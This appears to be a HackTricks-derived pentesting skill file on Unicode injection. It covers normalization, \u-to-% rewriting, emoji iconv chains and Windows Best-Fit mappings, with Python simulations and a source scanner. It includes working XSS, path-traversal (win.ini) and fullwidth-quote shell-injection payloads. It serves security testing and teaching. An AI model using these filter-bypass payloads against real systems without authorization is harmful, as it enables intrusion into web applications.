Hacktricks-skills unicode-injection-pentest
How to find and exploit Unicode injection vulnerabilities in web applications. Use this skill whenever you're testing for XSS, SQLi, or other injection vulnerabilities and want to try Unicode-based bypass techniques. Trigger this when you encounter input validation, WAF filters, or encoding issues that might be vulnerable to Unicode normalization attacks, emoji injection, or Windows Best-Fit character mapping exploits.
git clone https://github.com/abelrguezr/hacktricks-skills
Unicode Injection Pentesting
A skill for discovering and exploiting Unicode injection vulnerabilities in web applications.
Overview
Unicode injection vulnerabilities occur when back-end or front-end systems behave unexpectedly when receiving unusual Unicode characters. Attackers can bypass protections and inject arbitrary characters to exploit injection vulnerabilities like XSS or SQLi.
Attack Vectors
1. Unicode Normalization Attacks
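When it happens: Systems transform user input after it has been validated (e.g. converting to uppercase/lowercase, or applying Unicode normalization such as NFKC).
How it works: Compatibility characters (such as fullwidth forms) and special case mappings collapse into ASCII during the transformation. This produces characters the filter never saw.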
Example:
Input: ＜ (U+FF1C, fullwidth less-than sign)
After NFKC normalization: <
Result: < character injected after the filter has already run
Testing approach:
- Identify input fields with case conversion or normalization
- Send Unicode characters that normalize to dangerous ASCII
- Check if the normalized output bypasses filters
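The sketch below assumes a blacklist check that runs before an NFKC normalization step. Both functions (`naive_filter`, `post_validation_transform`) are hypothetical stand-ins for the target's logic. Only `unicodedata.normalize` and `str.upper`/`str.lower` are real Python APIs.

```python
import unicodedata

def naive_filter(s: str) -> bool:
    """Hypothetical blacklist check that runs BEFORE normalization."""
    return "<" not in s and ">" not in s

def post_validation_transform(s: str) -> str:
    """Hypothetical later step: NFKC normalization applied after the check."""
    return unicodedata.normalize("NFKC", s)

payload = "\uff1cscript\uff1e"  # fullwidth < and > around ASCII "script"
assert naive_filter(payload)     # the filter sees no ASCII angle brackets
print(post_validation_transform(payload))  # <script>

# Case conversion can also collapse non-ASCII letters into ASCII:
print("\u017f".upper())  # LATIN SMALL LETTER LONG S -> S
print("\u212a".lower())  # KELVIN SIGN -> k
```

The same idea applies to any transformation that runs after validation. The check and the sink simply see different strings.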
2. \u to % Conversion Attacks
When it happens: The backend transforms the \u prefix into % (URL-encoding style).
How it works: The character 㱋 is written \u3c4b. If the backend rewrites this as %3c4b, URL decoding yields <4b, injecting <.
Testing approach:
- Find Unicode characters whose \u representation starts with the hex code of the character you need (e.g. \u3c.. for <)
- Send them to the application
- Check whether the backend converts \u to %
- Verify whether URL decoding creates injection characters
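The following is a minimal simulation of that flaw. It assumes a hypothetical backend that escapes non-ASCII input as \uXXXX (as Python's `json.dumps` does by default), then rewrites \u to % and URL-decodes. `vulnerable_pipeline` and `char_for` are illustrative names, not part of any real application.

```python
import json
from urllib.parse import unquote

def vulnerable_pipeline(user_input: str) -> str:
    """Hypothetical backend: JSON-escapes non-ASCII input as \\uXXXX, then
    naively rewrites the \\u prefix to % and URL-decodes the result."""
    escaped = json.dumps(user_input)[1:-1]   # drop the surrounding JSON quotes
    rewritten = escaped.replace("\\u", "%")  # the faulty \u -> % step
    return unquote(rewritten)

def char_for(target: str, low_byte: int = 0x4B) -> str:
    """Pick a code point whose high byte is the ASCII code of `target`."""
    return chr((ord(target) << 8) | low_byte)

payload = char_for("<")                        # U+3C4B, i.e. 㱋
print(payload, vulnerable_pipeline(payload))  # 㱋 <4b
```

The low byte survives as two literal hex digits after the injected character, so choose it so those digits fit the surrounding context.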
Useful resources:
- Unicode Explorer - Find character codes
- Unicode Injection Research - Deep dive
3. Emoji Injection Attacks
When it happens: Backends mishandle emoji encoding conversions.
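How it works: Encoding mismatches (e.g. Windows-1252 to UTF-8 to ASCII) can turn emoji into dangerous characters. The UTF-8 bytes of 💋 end in 0x8B, which Windows-1252 reads as ‹ (U+2039). The bytes of 💛 end in 0x9B, read as › (U+203A). ASCII//TRANSLIT then turns ‹ and › into < and >, after htmlspecialchars has already run.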
Example payload:
💋img src=x onerror=alert(document.domain)//💛
Vulnerable pattern:
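$str = htmlspecialchars($_GET["str"]);           // escaping happens first, while the input still holds emoji
$str = iconv("Windows-1252", "UTF-8", $str);    // UTF-8 bytes are reinterpreted as Windows-1252 (0x8B -> ‹, 0x9B -> ›)
$str = iconv("UTF-8", "ASCII//TRANSLIT", $str); // transliteration turns ‹ and › into < and >
echo $str;                                      // reflected without re-escaping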
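To reproduce the chain offline, the Python model below reads the UTF-8 bytes as Windows-1252 (`cp1252`) and then applies a transliteration step. Python has no built-in equivalent of iconv's ASCII//TRANSLIT, so `translit_ascii` is a hypothetical stand-in. It models only the ‹ and › mappings the attack needs and emits "?" for every other non-ASCII character; real glibc output for those other characters may differ.

```python
import html

# Rough stand-in for iconv(..., "ASCII//TRANSLIT"). Only the two mappings this
# attack relies on are modelled; any other non-ASCII character becomes "?".
TRANSLIT_SUBSET = {"\u2039": "<", "\u203a": ">"}

def translit_ascii(s: str) -> str:
    return "".join(c if ord(c) < 128 else TRANSLIT_SUBSET.get(c, "?") for c in s)

def vulnerable_pipeline(raw: bytes) -> str:
    """Python model of the PHP chain (assumed equivalent for this payload)."""
    escaped = html.escape(raw.decode("utf-8"))            # htmlspecialchars(): nothing to escape yet
    as_cp1252 = escaped.encode("utf-8").decode("cp1252")  # UTF-8 bytes reread as Windows-1252
    return translit_ascii(as_cp1252)                      # ‹ -> <, › -> >

payload = "💋img src=x onerror=alert(document.domain)//💛".encode("utf-8")
print(vulnerable_pipeline(payload))
```

The payload contains no < or >, so the escaping step leaves it untouched. The tag only appears after the two later conversions.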
Testing approach:
- Send emoji payloads with embedded injection code
- Check for encoding conversion chains
- Look for normalization to ASCII characters
Emoji lists: see Unicode Emoji Charts under Tools and Resources
4. Windows Best-Fit/Worst-Fit Attacks
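When it happens: A Windows application receives Unicode (UTF-16) input but passes it to "A" (ANSI) APIs instead of "W" (wide) APIs. The string is converted to the active ANSI code page, which triggers Best-Fit conversion.
How it works: Windows replaces Unicode characters that cannot be represented in the code page (e.g. Windows-1252) with visually similar ASCII characters instead of failing.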
Common mappings:
- Characters mapped to / (0x2F): path traversal
- Characters mapped to \ (0x5C): path traversal
- Fullwidth double quote (U+FF02): argument injection
Example:
Input: ＂ (fullwidth double quote U+FF02)
After Best-Fit: " (ASCII double quote)
Result: shell argument splitting
Testing approach:
- Check if target uses Windows with W→A API conversion
- Use worst.fit mapping to find character mappings
- Send Unicode characters that map to dangerous ASCII
- Test blacklist bypasses, path traversal, shell escape bypasses
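The sketch below shows why a blacklist applied to the wide string fails once a W→A conversion runs afterwards. It makes two assumptions. First, the filter is hypothetical. Second, the mapping table is an illustrative subset of Windows-1252 Best-Fit entries, not the real table; confirm each mapping against worst.fit. Characters outside the code page with no known mapping fall back to "?", Windows' default character.

```python
# Illustrative subset of Windows-1252 Best-Fit mappings. These entries are an
# assumption for this sketch; confirm every mapping against worst.fit.
BEST_FIT_SUBSET = {
    "\uff02": '"',   # FULLWIDTH QUOTATION MARK
    "\uff0f": "/",   # FULLWIDTH SOLIDUS
    "\uff3c": "\\",  # FULLWIDTH REVERSE SOLIDUS
}

BLACKLIST = set('"/\\')

def passes_blacklist(s: str) -> bool:
    """Hypothetical filter applied to the wide (UTF-16) string."""
    return not any(c in BLACKLIST for c in s)

def to_ansi(s: str) -> str:
    """Simulate the W->A conversion: keep characters Windows-1252 can encode,
    best-fit the known ones, and fall back to '?' for everything else."""
    out = []
    for c in s:
        try:
            c.encode("cp1252")
            out.append(c)
        except UnicodeEncodeError:
            out.append(BEST_FIT_SUBSET.get(c, "?"))
    return "".join(out)

path = "..\uff0f..\uff0fwindows\uff0fwin.ini"
print(passes_blacklist(path), to_ansi(path))  # True ../../windows/win.ini
```

Replacing the slashes with U+FF02 shows the argument-injection case in the same way. The filter passes, and the ANSI string contains a plain ".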
Testing Workflow
Step 1: Reconnaissance
- Identify input vectors: Forms, URL parameters, headers, file uploads
- Check for encoding: Look for iconv, htmlspecialchars, case conversion
- Determine platform: Windows vs Linux (affects Best-Fit applicability)
- Map the data flow: Where does input go? What transformations occur?
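During source review, a small scanner can flag the transformation calls listed above. The watch-list below is a hypothetical starting point: it covers PHP `iconv`, `htmlspecialchars`, `strtolower`/`mb_strtolower`, `Normalizer::normalize`, generic `.lower()`/`.normalize(` calls, and the Win32 `WideCharToMultiByte`. Extend it for the codebase under test.

```python
import re

# Hypothetical watch-list of calls that transform input; extend it per codebase.
RISKY_PATTERNS = {
    "iconv": re.compile(r"\biconv\s*\("),
    "translit": re.compile(r"ASCII//TRANSLIT"),
    "htmlspecialchars": re.compile(r"\bhtmlspecialchars\s*\("),
    "case conversion": re.compile(r"\b(?:mb_)?strto(?:lower|upper)\s*\(|\.(?:lower|upper|casefold)\(\)"),
    "unicode normalization": re.compile(r"\bNormalizer::normalize\b|\.normalize\s*\("),
    "W->A conversion": re.compile(r"\bWideCharToMultiByte\b"),
}

def scan(source: str) -> list[tuple[int, str]]:
    """Return (line number, label) for every line that matches a watched pattern."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for label, pattern in RISKY_PATTERNS.items():
            if pattern.search(line):
                hits.append((lineno, label))
    return hits

sample = (
    '$str = htmlspecialchars($_GET["str"]);\n'
    '$str = iconv("Windows-1252", "UTF-8", $str);\n'
    '$str = iconv("UTF-8", "ASCII//TRANSLIT", $str);\n'
)
for hit in scan(sample):
    print(hit)
```

Pay particular attention to the order of hits. Escaping that comes before a conversion, as in the sample, is the pattern to look for.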
Step 2: Initial Testing
- Send basic Unicode: Test with common Unicode characters
- Check normalization: Look for case conversion or encoding changes
- Test emoji: Send emoji payloads with embedded code
- Try \u sequences: Send Unicode escape sequences
Step 3: Advanced Testing
- Use worst.fit mappings: Find characters that map to dangerous ASCII
- Test encoding chains: Multiple conversions can create vulnerabilities
- Bypass blacklists: Use Unicode equivalents of blocked characters
- Path traversal: Map characters to / and \
- Shell injection: Use fullwidth quotes for argument splitting
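To find Unicode equivalents of a blocked character, you can brute-force the code space. The helper below is a hypothetical name; it uses only Python's `unicodedata` and string case methods. It covers NFKC and case mapping but not Windows Best-Fit, which needs the worst.fit tables. Results depend on the Unicode version bundled with the Python interpreter.

```python
import sys
import unicodedata

def lookalikes(target: str, max_cp: int = sys.maxunicode + 1) -> dict[str, list[str]]:
    """List non-ASCII characters that turn into `target` under NFKC
    normalization, lowercasing, or uppercasing."""
    found: dict[str, list[str]] = {"nfkc": [], "lower": [], "upper": []}
    for cp in range(0x80, max_cp):
        if 0xD800 <= cp <= 0xDFFF:  # lone surrogates are not real characters
            continue
        ch = chr(cp)
        if unicodedata.normalize("NFKC", ch) == target:
            found["nfkc"].append(ch)
        if ch.lower() == target:
            found["lower"].append(ch)
        if ch.upper() == target:
            found["upper"].append(ch)
    return found

for ch in lookalikes("<")["nfkc"]:
    print(f"U+{ord(ch):04X} {unicodedata.name(ch, '?')}")
```

Scanning all of Unicode takes a second or two. Passing `max_cp=0x10000` limits the search to the Basic Multilingual Plane.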
Step 4: Verification
- Check output: Does the injection work?
- Review logs: What did the backend receive?
- Test impact: Can you execute code, read files, etc.?
- Document findings: Save payloads and results
Common Payloads
XSS via Unicode
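㱋 (\u3c4b) → <4b once the backend rewrites \u to % and URL-decodes
💋img src=x onerror=alert(1)//💛 → the emoji become < and > after the Windows-1252 → ASCII//TRANSLIT chain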
Path Traversal via Best-Fit
..\u2215..\u2215..\u2215windows\u2215win.ini # Characters Best-Fit mapped to / (Windows targets only)
Shell Injection via Fullwidth Quotes
\uff02ls\uff02 # Fullwidth quotes (U+FF02) become ASCII " after Best-Fit and can close a quoted argument
Tools and Resources
- Unicode Explorer - Character lookup
- worst.fit - Windows Best-Fit mappings
- Unicode Emoji Charts - Emoji reference
Important Notes
- Windows Best-Fit requires W→A API conversion: Not all Windows apps are vulnerable
- Encoding matters: UTF-8, Windows-1252, ASCII conversions create different behaviors
- Some vulnerabilities won't be fixed: Best-Fit is a Windows feature, not a bug
- Test in context: What works depends on the specific application and platform
When to Use This Skill
- Testing input validation and WAF bypasses
- Investigating XSS or SQLi that seems filtered
- Analyzing encoding-related issues
- Pentesting Windows-based web applications
- Reviewing applications with Unicode handling
- When standard injection payloads are blocked
Safety and Ethics
- Only test systems you have authorization to test
- Document all findings for remediation
- Unicode injection can have unintended side effects
- Some exploits may cause application crashes or data corruption